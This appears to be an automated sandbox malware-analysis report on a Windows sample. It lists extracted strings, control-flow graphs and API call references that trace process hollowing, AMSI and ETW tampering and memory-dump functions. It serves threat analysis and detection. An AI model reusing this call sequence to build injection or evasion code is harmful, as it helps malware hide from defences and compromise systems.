$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                                                                                                                                                                                                                                                                                  • API String ID: 297057983-2644593349
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ddd091142c2fa10b99aeca47ac0d49089f5828510c7961b313448d5e06840f2a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: eef5c2b1240100df40b99183253018f484fb9522bc91bb9c17cf463cafd4a121
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ddd091142c2fa10b99aeca47ac0d49089f5828510c7961b313448d5e06840f2a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89140C34A4015DDBDB12EB65DCA0ADE73BAFF89304F5040A6D40AAB315DB30AE85CF65
                                                                                                                                                                                                                                                                                                                                  Function 02DC8D70 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654threadnativeinjectionCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 6027 2dc8d70-2dc8d73 6028 2dc8d78-2dc8d7d 6027->6028 6028->6028 6029 2dc8d7f-2dc8e66 call 2db4990 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 6028->6029 6060 2dc8e6c-2dc8f47 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 6029->6060 6061 2dca8b7-2dca921 call 2db4500 * 2 call 2db4c60 call 2db4500 call 2db44dc call 2db4500 * 2 6029->6061 6060->6061 6105 2dc8f4d-2dc9275 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db30d4 * 2 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4de0 call 2db4df0 call 2dc8788 6060->6105 6214 2dc92e8-2dc9609 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db2ee0 call 2db2f08 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 GetThreadContext 6105->6214 6215 2dc9277-2dc92e3 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 6105->6215 6214->6061 6323 2dc960f-2dc9872 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2dc8400 6214->6323 6215->6214 6396 2dc9b7f-2dc9beb call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 6323->6396 6397 2dc9878-2dc99e1 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2dc8670 6323->6397 6424 2dc9bf0-2dc9d70 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2dc7a2c 6396->6424 6487 2dc9a0b-2dc9a77 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 6397->6487 6488 2dc99e3-2dc9a09 call 2dc7a2c 6397->6488 6424->6061 6528 2dc9d76-2dc9e6f call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2dc8c80 6424->6528 6496 2dc9a7c-2dc9b73 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2dc7a2c 6487->6496 6488->6496 6567 2dc9b78-2dc9b7d 6496->6567 6579 2dc9e71-2dc9ebe call 2dc8b78 call 2dc8b6c 6528->6579 6580 2dc9ec3-2dca61b call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2dc7d78 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2dc7d78 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 SetThreadContext NtResumeThread call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db2c2c call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2dc894c * 3 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 6528->6580 6567->6424 6579->6580 6805 2dca620-2dca8b2 call 2dc894c * 2 call 2db4860 call 2db49a0 call 2db47ec call 2db49a0 call 2dc894c call 2db4860 call 2db49a0 call 2db47ec call 2db49a0 call 2dc894c * 5 call 2db4860 call 2db49a0 call 2db47ec call 2db49a0 call 2dc894c call 2db4860 call 2db49a0 call 2db47ec call 2db49a0 call 2dc894c call 2db4860 call 2db49a0 call 2db47ec call 2db49a0 call 2dc894c call 2db4860 call 2db49a0 call 2db47ec call 2db49a0 call 2dc894c call 2dc8080 call 2dc894c * 2 6580->6805 6805->6061
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC89D0: FreeLibrary.KERNEL32(74B10000,00000000,00000000,00000000,00000000,02E3738C,Function_0000662C,00000004,02E3739C,02E3738C,05F5E103,00000040,02E373A0,74B10000,00000000,00000000), ref: 02DC8AAA
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02DC8814
                                                                                                                                                                                                                                                                                                                                  • GetThreadContext.KERNEL32(000008EC,02E37424,ScanString,02E373A8,02DCA93C,UacInitialize,02E373A8,02DCA93C,ScanBuffer,02E373A8,02DCA93C,ScanBuffer,02E373A8,02DCA93C,UacInitialize,02E373A8), ref: 02DC9602
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DC8471
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02DC86D5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DC7A9F
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DC7DEC
                                                                                                                                                                                                                                                                                                                                  • SetThreadContext.KERNEL32(000008EC,02E37424,ScanBuffer,02E373A8,02DCA93C,ScanString,02E373A8,02DCA93C,Initialize,02E373A8,02DCA93C,000008F0,002A3FF8,02E374FC,00000004,02E37500), ref: 02DCA317
                                                                                                                                                                                                                                                                                                                                  • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(000008EC,00000000,000008EC,02E37424,ScanBuffer,02E373A8,02DCA93C,ScanString,02E373A8,02DCA93C,Initialize,02E373A8,02DCA93C,000008F0,002A3FF8,02E374FC), ref: 02DCA324
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC894C: LoadLibraryW.KERNEL32(bcrypt,?,000008EC,00000000,02E373A8,02DCA587,ScanString,02E373A8,02DCA93C,ScanBuffer,02E373A8,02DCA93C,Initialize,02E373A8,02DCA93C,UacScan), ref: 02DC8960
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02DC897A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008EC,00000000,02E373A8,02DCA587,ScanString,02E373A8,02DCA93C,ScanBuffer,02E373A8,02DCA93C,Initialize), ref: 02DC89B6
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: LibraryMemoryThreadVirtual$ContextFree$AddressAllocateCreateLoadProcProcessReadResumeSectionUnmapUserViewWrite
                                                                                                                                                                                                                                                                                                                                  • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2388221946-51457883
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3032425bcd210af0f67fe28b5cb38d4a09720630055ccb6d331e783c6cd53049
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 10ec85fc99957f77a740d07ac1447f70842a0d10f9c4786797e48e4311f4b4ab
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3032425bcd210af0f67fe28b5cb38d4a09720630055ccb6d331e783c6cd53049
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5CE2FD35A4115DDBDB16EB64DCA5BCE73BAEF84300FA041A6E006AB315DE30AE45CF61
                                                                                                                                                                                                                                                                                                                                  Function 02DC8D6E Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605threadCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 6883 2dc8d6e-2dc8d73 6885 2dc8d78-2dc8d7d 6883->6885 6885->6885 6886 2dc8d7f-2dc8e66 call 2db4990 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 6885->6886 6917 2dc8e6c-2dc8f47 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 6886->6917 6918 2dca8b7-2dca921 call 2db4500 * 2 call 2db4c60 call 2db4500 call 2db44dc call 2db4500 * 2 6886->6918 6917->6918 6962 2dc8f4d-2dc9275 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db30d4 * 2 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4de0 call 2db4df0 call 2dc8788 6917->6962 7071 2dc92e8-2dc9609 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db46d4 * 2 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db2ee0 call 2db2f08 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 GetThreadContext 6962->7071 7072 2dc9277-2dc92e3 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 6962->7072 7071->6918 7180 2dc960f-2dc9872 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2dc8400 7071->7180 7072->7071 7253 2dc9b7f-2dc9beb call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 7180->7253 7254 2dc9878-2dc99e1 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2dc8670 7180->7254 7281 2dc9bf0-2dc9d70 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2dc7a2c 7253->7281 7344 2dc9a0b-2dc9a77 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 7254->7344 7345 2dc99e3-2dc9a09 call 2dc7a2c 7254->7345 7281->6918 7385 2dc9d76-2dc9e6f call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2dc8c80 7281->7385 7353 2dc9a7c-2dc9b7d call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2dc7a2c 7344->7353 7345->7353 7353->7281 7436 2dc9e71-2dc9ebe call 2dc8b78 call 2dc8b6c 7385->7436 7437 2dc9ec3-2dca8b2 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2dc7d78 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2dc7d78 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 SetThreadContext NtResumeThread call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2db2c2c call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2dc894c * 3 call 2db4860 call 2db49a0 call 2db46d4 call 2db47ec call 2db49a0 call 2db46d4 call 2dc89d0 call 2dc894c * 2 call 2db4860 call 2db49a0 call 2db47ec call 2db49a0 call 2dc894c call 2db4860 call 2db49a0 call 2db47ec call 2db49a0 call 2dc894c * 5 call 2db4860 call 2db49a0 call 2db47ec call 2db49a0 call 2dc894c call 2db4860 call 2db49a0 call 2db47ec call 2db49a0 call 2dc894c call 2db4860 call 2db49a0 call 2db47ec call 2db49a0 call 2dc894c call 2db4860 call 2db49a0 call 2db47ec call 2db49a0 call 2dc894c call 2dc8080 call 2dc894c * 2 7385->7437 7436->7437 7437->6918
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC89D0: FreeLibrary.KERNEL32(74B10000,00000000,00000000,00000000,00000000,02E3738C,Function_0000662C,00000004,02E3739C,02E3738C,05F5E103,00000040,02E373A0,74B10000,00000000,00000000), ref: 02DC8AAA
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02DC8814
                                                                                                                                                                                                                                                                                                                                  • GetThreadContext.KERNEL32(000008EC,02E37424,ScanString,02E373A8,02DCA93C,UacInitialize,02E373A8,02DCA93C,ScanBuffer,02E373A8,02DCA93C,ScanBuffer,02E373A8,02DCA93C,UacInitialize,02E373A8), ref: 02DC9602
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DC8471
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC8670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02DC86D5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 02DC7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DC7A9F
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2214111132.0000000002DB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002E37000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2222952244.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_2db0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: MemoryVirtual$AllocateContextCreateFreeLibraryProcessReadSectionThreadUnmapUserView
                                                                                                                                                                                                                                                                                                                                  • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3386062106-51457883
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6f8b58d1a85d8d0231d34497d14badbe8048a1fb2858488e8625f03c66545336
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 75163724efb9833401d6d0fdc8991c565416d8c6b06f859bb732b51202d5e102
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f8b58d1a85d8d0231d34497d14badbe8048a1fb2858488e8625f03c66545336
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2CE2FC35A4115DDBDB16EB64DCA5BCE73BAEF84300FA041A6E006AB315DE30AE45CF61
                                                                                                                                                                                                                                                                                                                                  Function 02DB5ACC Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 10945 2db5acc-2db5b0d GetModuleFileNameA RegOpenKeyExA 10946 2db5b4f-2db5b92 call 2db5908 RegQueryValueExA 10945->10946 10947 2db5b0f-2db5b2b RegOpenKeyExA 10945->10947 10952 2db5bb6-2db5bd0 RegCloseKey 10946->10952 10953 2db5b94-2db5bb0 RegQueryValueExA 10946->10953 10947->10946 10948 2db5b2d-2db5b49 RegOpenKeyExA 10947->10948 10948->10946 10950 2db5bd8-2db5c09 lstrcpynA GetThreadLocale GetLocaleInfoA 10948->10950 10954 2db5c0f-2db5c13 10950->10954 10955 2db5cf2-2db5cf9 10950->10955 10953->10952 10956 2db5bb2 10953->10956 10958 2db5c1f-2db5c35 lstrlenA 10954->10958 10959 2db5c15-2db5c19 10954->10959 10956->10952 10960 2db5c38-2db5c3b 10958->10960 10959->10955 10959->10958 10961 2db5c3d-2db5c45 10960->10961 10962 2db5c47-2db5c4f 10960->10962 10961->10962 10963 2db5c37 10961->10963 10962->10955 10964 2db5c55-2db5c5a 10962->10964 10963->10960 10965 2db5c5c-2db5c82 lstrcpynA LoadLibraryExA 10964->10965 10966 2db5c84-2db5c86 10964->10966 10965->10966 10966->10955 10967 2db5c88-2db5c8c 10966->10967 10967->10955 10968 2db5c8e-2db5cbe lstrcpynA LoadLibraryExA 10967->10968 10968->10955 10969 2db5cc0-2db5cf0 lstrcpynA LoadLibraryExA 10968->10969 10969->10955
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02DB0000,02DDE790), ref: 02DB5AE8
